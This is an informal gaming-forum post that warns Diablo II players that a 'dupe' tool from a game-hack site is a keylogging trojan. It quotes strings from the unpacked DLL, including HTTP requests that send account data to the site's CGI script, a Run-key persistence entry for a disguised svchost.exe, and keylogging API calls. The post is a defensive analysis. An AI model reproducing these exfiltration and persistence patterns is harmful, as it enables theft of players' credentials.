SIgh
Ok, noobs. The site
www.d2gamehacks.com has nothing *but* keylogging apps on it.
If any of you had any amount of common sense, you would *hex edit* these programs before running them. Or even more common sense, any "program" you see with the word dupe in it, not even download AT ALL.
But if you don't, then you would see the file anti-detect.dll [as found in one file from that site, i believe the dupe app] is packed with UPX. After unpacking, a simple hex edit discovers the following:
GET /hello.cgi?account=new3&logs=heyey HTTP/1.0.HOST: d2gamehacks.com...64.202.163.7.... HTTP/1.0.HOST: d2gamehacks.com.....&logs=RUNNING!.. <-- cgi script to retrieve data, i.e. account/password/cd keys etc.
GET /cgi/hello.cgi?account=.svchost.C:\Windows\svchost.exe..Software\Microsoft\Windows\CurrentVersion\Run...CVTmod.exe..c:\Windows\svchost.exe. <-- name of trojan CVTmod.exe, also svchost.exe as a desguise to look like a legit file but the real svchost lies in system32, not $windir.
.DIABLO ACTIVE!..Diablo II...Preferred Realm.Last BNet...Software\Blizzard Entertainment\Diablo II...JUSTTOCHECK.%2f.%22.%25.%27.%3a.%7d.%7b.%5d.%5b.%29.%28.%23.%21.%24.%26.%5c.%7c.%2a.%3e.%3c.%3b.&logs=..&realm=.. @....... <-- self explanatory..
Various API calls include:
GetCurrentProcess...UnhandledExceptionFilter..GetModuleFileNameA..FreeEnvironmentStringsA...FreeEnvironmentStringsW...WideCharToMultiByte...GetEnvironmentStrings...GetEnvironmentStringsW..SetHandleCount..
RegOpenKeyExA...RegSetValueExA..RegCloseKey...RegQueryValueExA..GetPixel..GetForegroundWindow
These are various registry functions among other things. They can extract your last account entered, realm, install path and plenty of other things you don't want people knowing. Also,
GetAsyncKeyState..
Ok people. This function has only one use. Keylogging. Nothing else. If you see this and still wilingly open this program, you are a total noob moron.
Getpixel and other api calls are used which could grab the connect to determine when the mouse overs the battle.net command button, and thus would activate the keylogger to effectively steal your noob asses account and password.
Not to mention the whole 'heart beat packet' explanation for the dupe method on the page makes no sense whatsoever, there are a gillion warning signs here. Don't be a noob. There are *no* public dupe "programs"
Somone help verify if the site is legit or not. Thank you
